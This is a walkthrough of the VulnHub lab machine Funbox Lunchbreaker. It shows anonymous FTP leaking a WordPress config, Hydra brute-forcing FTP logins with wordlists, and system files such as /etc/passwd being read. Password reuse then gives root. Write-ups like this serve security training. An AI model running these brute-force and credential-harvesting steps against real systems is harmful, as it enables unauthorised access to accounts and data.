Funbox Lunchbreak
Author: jason huawen
Virtual Machine Information
Name:Funbox: Lunchbreaker
URL:
https://www.vulnhub.com/entry/funbox-lunchbreaker,700/
Identify IP Address of Virtual Machine
Import the Virtual Machine into the VirtualBox. Configure its network adapater with host-only mode. Start both Kali Linux and the Virtual Machine
Use in-built netdiscover to discover IP address of the Virtual Machine as 192.168.56.154.
─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
NMAP Scanning
Perform compehensive scan the Virtual Machine with NMAP:
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.154 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-04 02:19 EDT
Nmap scan report for bogon (192.168.56.154)
Host is up (0.00021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
|_drwxr-xr-x 6 1006 1006 4096 May 22 2021 wordpress
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1d:3d:bf:5a:e1:9f:bb:31:85:34:94:24:cf:0c:04:20 (RSA)
| 256 3b:e1:5c:97:5a:93:1d:9c:d5:02:e5:d8:15:a7:92:ea (ECDSA)
|_ 256 d6:f2:e3:da:7e:d7:3f:94:7e:3b:5d:bc:ef:ee:49:63 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:72:FC:B8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
NMAP scanning results show that the virtual machine has 3 open ports: 21(ftp), 22(ssh),80(http)
Get Foothold
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ ftp 192.168.56.154
Connected to 192.168.56.154.
220 (vsFTPd 3.0.3)
Name (192.168.56.154:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40621|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 118 4096 May 22 2021 .
drwxr-xr-x 3 0 118 4096 May 22 2021 ..
-rw-r--r-- 1 0 0 233 May 22 2021 .s3cr3t
-rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
drwxr-xr-x 6 1006 1006 4096 May 22 2021 wordpress
226 Directory send OK.
ftp> cd wordpress
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||25834|)
150 Here comes the directory listing.
drwxr-xr-x 6 1006 1006 4096 May 22 2021 .
drwxr-xr-x 3 0 118 4096 May 22 2021 ..
-rw-r--r-- 1 1006 1006 405 Feb 06 2020 index.php
-rw-r--r-- 1 1006 1006 19915 May 13 2021 license.txt
-rw-r--r-- 1 1006 1006 8630 May 13 2021 liesmich.html
-rw-r--r-- 1 1006 1006 7345 May 13 2021 readme.html
-rw-r--r-- 1 1006 1006 7165 Jan 21 2021 wp-activate.php
drwxr-xr-x 9 1006 1006 4096 May 13 2021 wp-admin
drwxr-xr-x 2 0 0 4096 May 22 2021 wp-blog
-rw-r--r-- 1 1006 1006 351 Feb 06 2020 wp-blog-header.php
-rw-r--r-- 1 1006 1006 2328 Feb 17 2021 wp-comments-post.php
-rw-r--r-- 1 1006 1006 3665 May 13 2021 wp-config-sample.php
-rw-r--r-- 1 0 0 3611 May 22 2021 wp-config.php
drwxr-xr-x 5 1006 1006 4096 May 13 2021 wp-content
-rw-r--r-- 1 1006 1006 3939 Jul 30 2020 wp-cron.php
drwxr-xr-x 25 1006 1006 12288 May 13 2021 wp-includes
-rw-r--r-- 1 1006 1006 2496 Feb 06 2020 wp-links-opml.php
-rw-r--r-- 1 1006 1006 3313 Jan 10 2021 wp-load.php
-rw-r--r-- 1 1006 1006 44994 Apr 04 2021 wp-login.php
-rw-r--r-- 1 1006 1006 8509 Apr 14 2020 wp-mail.php
-rw-r--r-- 1 1006 1006 21125 Feb 02 2021 wp-settings.php
-rw-r--r-- 1 1006 1006 31328 Jan 27 2021 wp-signup.php
-rw-r--r-- 1 1006 1006 4747 Oct 08 2020 wp-trackback.php
-rw-r--r-- 1 1006 1006 3236 Jun 08 2020 xmlrpc.php
226 Directory send OK.
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
229 Entering Extended Passive Mode (|||36716|)
150 Opening BINARY mode data connection for wp-config.php (3611 bytes).
100% |****************************************************************************************************************| 3611 33.77 KiB/s 00:00 ETA
226 Transfer complete.
3611 bytes received in 00:00 (33.58 KiB/s)
ftp> pwd
Remote directory: /wordpress
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ cat wp-config.php
<?php
/**
* Grundeinstellungen für WordPress
*
* Zu diesen Einstellungen gehören:
*
* * MySQL-Zugangsdaten,
* * Tabellenpräfix,
* * Sicherheitsschlüssel
* * und ABSPATH.
*
* Mehr Informationen zur wp-config.php gibt es auf der
* {@link https://codex.wordpress.org/Editing_wp-config.php wp-config.php editieren}
* Seite im Codex. Die Zugangsdaten für die MySQL-Datenbank
* bekommst du von deinem Webhoster.
*
* Diese Datei wird zur Erstellung der wp-config.php verwendet.
* Du musst aber dafür nicht das Installationsskript verwenden.
* Stattdessen kannst du auch diese Datei als wp-config.php mit
* deinen Zugangsdaten für die Datenbank abspeichern.
*
* @package WordPress
*/
// ** MySQL-Einstellungen ** //
/** Diese Zugangsdaten bekommst du von deinem Webhoster. **/
/**
* Ersetze datenbankname_hier_einfuegen
* mit dem Namen der Datenbank, die du verwenden möchtest.
*/
define( 'DB_NAME', 'wpdb' );
/**
* Ersetze benutzername_hier_einfuegen
* mit deinem MySQL-Datenbank-Benutzernamen.
*/
define( 'DB_USER', 'wpuser' );
/**
* Ersetze passwort_hier_einfuegen mit deinem MySQL-Passwort.
*/
define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ echo 'SWYgdGhlIHJhZGlhbmNlIG9mIGEgdGhvdXNhbmQgc3VucyAvIHdlcmUgdG8gYnVyc3QgYXQgb25jZSBpbnRvIHRoZSBza3kgLyB0aGF0IHdvdWxkIGJlIGxpa2UgLyB0aGUgc3BsZW5kb3Igb2YgdGhlIE1pZ2h0eSBPbmUgYW5kIEkgYW0gYmVjb21lIERlYXRoLCB0aGUgc2hhdHRlcmVyIG9mIHdvcmxkcw==' | base64 -d
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
supers3cr3t file is encoded in Brainfuck, which can be decoded by putting the message to the website:
https://www.splitbrain.org/services/ook
The decoded message is:
Look deep into nature and then you will understand everything better."
Tips:
I get much information from FTP service as anonymous user. But such information was actually some sorts of rabbithole.
Although it will be standard step to look around the souce code of HTML page, the comments are located at the far right of the screen so that I didn't notice its existent.
So we need to look at the souce code of home page very carefully, there is one comment:
<! webdesign by j.miller [jane@funbox8.ctf] >
"jane" is possible username.
Use hydra tool to crack the password for username: jane
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ hydra -l jane -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.154
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-04 02:45:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.154:21/
[21][ftp] host: 192.168.56.154 login: jane password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-04 02:46:03
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ftp 192.168.56.154
Connected to 192.168.56.154.
220 (vsFTPd 3.0.3)
Name (192.168.56.154:kali): jane
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /home/jane
ftp> ls -alh
229 Entering Extended Passive Mode (|||56129|)
150 Here comes the directory listing.
dr-x------ 3 1002 1002 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1002 1002 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1002 1002 807 May 22 2021 .profile
drwxr-xr-x 2 1002 1002 4096 May 22 2021 backups
226 Directory send OK.
ftp> cd backups
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||30605|)
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 22 2021 .
dr-x------ 3 1002 1002 4096 May 22 2021 ..
-rw-r--r-- 1 1002 1002 59 May 22 2021 keys.txt
226 Directory send OK.
ftp> get keys.txt
local: keys.txt remote: keys.txt
229 Entering Extended Passive Mode (|||44363|)
150 Opening BINARY mode data connection for keys.txt (59 bytes).
100% |****************************************************************************************************************| 59 0.54 KiB/s 00:00 ETA
226 Transfer complete.
59 bytes received in 00:00 (0.53 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13307|)
550 Permission denied.
ftp> cd /etc
250 Directory successfully changed.
ftp> get passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||46822|)
150 Opening BINARY mode data connection for passwd (2002 bytes).
100% |****************************************************************************************************************| 2002 73.43 MiB/s 00:00 ETA
226 Transfer complete.
2002 bytes received in 00:00 (5.45 MiB/s)
ftp>
Login to FTP as jane. I can navigate to different directory and download passwd onto the Kali Linux.
Now that we have known there are four users:ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||15719|)
150 Here comes the directory listing.
dr-x------ 3 1002 1002 4096 May 22 2021 jane
dr-x------ 3 1001 1001 4096 May 22 2021 jim
dr-x------ 4 1000 1000 4096 May 22 2021 john
drwx------ 4 1003 1003 4096 May 22 2021 julessh
Create user dictionary and crack the password with hydra tool:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ cat users.dict
jane
jim
john
jules
──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ftp 192.168.56.154
Connected to 192.168.56.154.
220 (vsFTPd 3.0.3)
Name (192.168.56.154:kali): jim
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||59387|)
150 Here comes the directory listing.
dr-x------ 3 1001 1001 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1001 1001 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1001 1001 3771 May 22 2021 .bashrc
-rw-r--r-- 1 1001 1001 807 May 22 2021 .profile
dr-xr-xr-x 2 1001 1001 4096 May 22 2021 .ssh
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||31706|)
150 Here comes the directory listing.
dr-xr-xr-x 2 1001 1001 4096 May 22 2021 .
dr-x------ 3 1001 1001 4096 May 22 2021 ..
-rw-r--r-- 1 1001 1001 0 May 22 2021 authorized_keys
-r-------- 1 1001 1001 0 May 22 2021 id_rsa
226 Directory send OK.
ftp>
Login to FTP as jim. Found .ssh directory, however content of those files are empty.
The password for jules: sexylady
Login to FTP as jules:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ftp 192.168.56.154
Connected to 192.168.56.154.
220 (vsFTPd 3.0.3)
Name (192.168.56.154:kali): jules
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||31530|)
150 Here comes the directory listing.
drwx------ 4 1003 1003 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
drwx------ 2 1003 1003 4096 May 22 2021 .backups
-rw------- 1 1003 1003 10 May 22 2021 .bash_history
-rw-r--r-- 1 1003 1003 220 May 22 2021 .bash_logout
-rw-r--r-- 1 1003 1003 3771 May 22 2021 .bashrc
drwx------ 2 1003 1003 4096 May 22 2021 .cache
-rw-r--r-- 1 1003 1003 807 May 22 2021 .profile
226 Directory send OK.
ftp> cd .backups
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||36485|)
150 Here comes the directory listing.
drwx------ 2 1003 1003 4096 May 22 2021 .
drwx------ 4 1003 1003 4096 May 22 2021 ..
-r-------- 1 1003 1003 139921517 May 22 2021 .bad-passwds
-r-------- 1 1003 1003 0 May 22 2021 .forbidden-passwds
-r-------- 1 1003 1003 562 May 22 2021 .good-passwd
-r-------- 1 1003 1003 0 May 22 2021 .very-bad-passwds
226 Directory send OK.
ftp> get .bad-passwds
local: .bad-passwds remote: .bad-passwds
229 Entering Extended Passive Mode (|||63173|)
150 Opening BINARY mode data connection for .bad-passwds (139921517 bytes).
100% |****************************************************************************************************************| 133 MiB 67.43 MiB/s 00:00 ETA
226 Transfer complete.
139921517 bytes received in 00:01 (67.40 MiB/s)
ftp> get .good-passwd
local: .good-passwd remote: .good-passwd
229 Entering Extended Passive Mode (|||17069|)
150 Opening BINARY mode data connection for .good-passwd (562 bytes).
100% |****************************************************************************************************************| 562 3.15 KiB/s 00:00 ETA
226 Transfer complete.
562 bytes received in 00:00 (3.12 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ls -alh
total 141M
drwxr-xr-x 2 kali kali 4.0K May 4 03:08 .
drwxr-xr-x 52 kali kali 4.0K May 4 02:28 ..
-rw-r--r-- 1 kali kali 134M May 22 2021 .bad-passwds
-rw-r--r-- 1 kali kali 562 May 22 2021 .good-passwd
-rw-r--r-- 1 kali kali 6.8M May 4 02:35 image.jpg
-rw-r--r-- 1 kali kali 59 May 22 2021 keys.txt
-rw-r--r-- 1 kali kali 2.0K May 22 2021 passwd
-rw-r--r-- 1 kali kali 233 May 22 2021 .s3cr3t
-rw-r--r-- 1 kali kali 633 May 22 2021 supers3cr3t
-rw-r--r-- 1 kali kali 12 May 4 02:47 test.txt
-rw-r--r-- 1 kali kali 20 May 4 02:53 users.dict
Download the two password dictionary from the home directory of jules.
──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ cat .good-passwd >> .bad-passwds
Combine these two password dictionaries
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ hydra -l john -P .bad-passwds ftp://192.168.56.154
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-04 03:10:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344447 login tries (l:1/p:14344447), ~896528 tries per task
[DATA] attacking ftp://192.168.56.154:21/
[21][ftp] host: 192.168.56.154 login: john password: zhnmju!!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-04 03:11:17
Crack password for user john with hydra tool.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ftp 192.168.56.154
Connected to 192.168.56.154.
220 (vsFTPd 3.0.3)
Name (192.168.56.154:kali): john
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||41791|)
150 Here comes the directory listing.
dr-x------ 4 1000 1000 4096 May 22 2021 .
drwxr-xr-x 6 0 0 4096 May 22 2021 ..
-rw-r--r-- 1 1000 1000 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Feb 25 2020 .bashrc
drwx------ 2 1000 1000 4096 May 22 2021 .cache
-rw-r--r-- 1 1000 1000 807 Feb 25 2020 .profile
drwx------ 2 1000 1000 4096 May 22 2021 .todo
226 Directory send OK.
ftp> get .todo
local: .todo remote: .todo
229 Entering Extended Passive Mode (|||28115|)
550 Failed to open file.
ftp> cd .todo
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||10834|)
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 22 2021 .
dr-x------ 4 1000 1000 4096 May 22 2021 ..
-rwx------ 1 1000 1000 131 May 22 2021 todo.list
226 Directory send OK.
ftp> get todo.list
local: todo.list remote: todo.list
229 Entering Extended Passive Mode (|||6938|)
150 Opening BINARY mode data connection for todo.list (131 bytes).
100% |****************************************************************************************************************| 131 12.43 KiB/s 00:00 ETA
226 Transfer complete.
131 bytes received in 00:00 (11.93 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ cat todo.list
1. Install LAMP
2. Install MAIL-System
3. Install Firewall
4. Install Plesk
5. Chance R00TPASSWD, because it's the same right now.
The fifth point means that the root user has the same password as john.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ssh root@192.168.56.154
root@192.168.56.154's password:
Permission denied, please try again.
root@192.168.56.154's password:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FunboxLunch]
└─$ ssh john@192.168.56.154
john@192.168.56.154's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 04 May 2023 07:13:27 AM UTC
System load: 0.09 Processes: 129
Usage of /: 76.5% of 4.37GB Users logged in: 0
Memory usage: 39% IPv4 address for enp0s3: 192.168.56.154
Swap usage: 0%
64 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat May 22 16:03:57 2021 from 192.168.178.143
john@funbox8:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),30(dip),46(plugdev)
john@funbox8:~$ su - root
Password:
root@funbox8:~# cd /root
root@funbox8:~# ls -alh
total 52K
drwx------ 4 root root 4.0K May 22 2021 .
drwxr-xr-x 20 root root 4.0K May 22 2021 ..
-rw------- 1 root root 238 May 22 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 369 May 22 2021 root.flag
-rwxr-xr-x 1 root root 35 May 22 2021 run.sh
drwxr-xr-x 3 root root 4.0K May 22 2021 snap
drwx------ 2 root root 4.0K May 22 2021 .ssh
-rw------- 1 root root 16K May 22 2021 .viminfo
root@funbox8:~# cat root.flag
|~~ | | | | |
|--| ||/~\ |~~\/~\\/o | | ||/~\ /~~|/~\ |~~\|/~\/~//~~||_//~/|/~\
| \_/|| ||__/\_//\o |__\_/|| |\__| ||__/| \/_\__|| \\/_|
created by @0815R2d2.
Congrats ! I look forward to see this on my twitter-account :-)
root@funbox8:~#
Failed to login to SSH as root . But it works for user:john. Then use the same password to switch to root.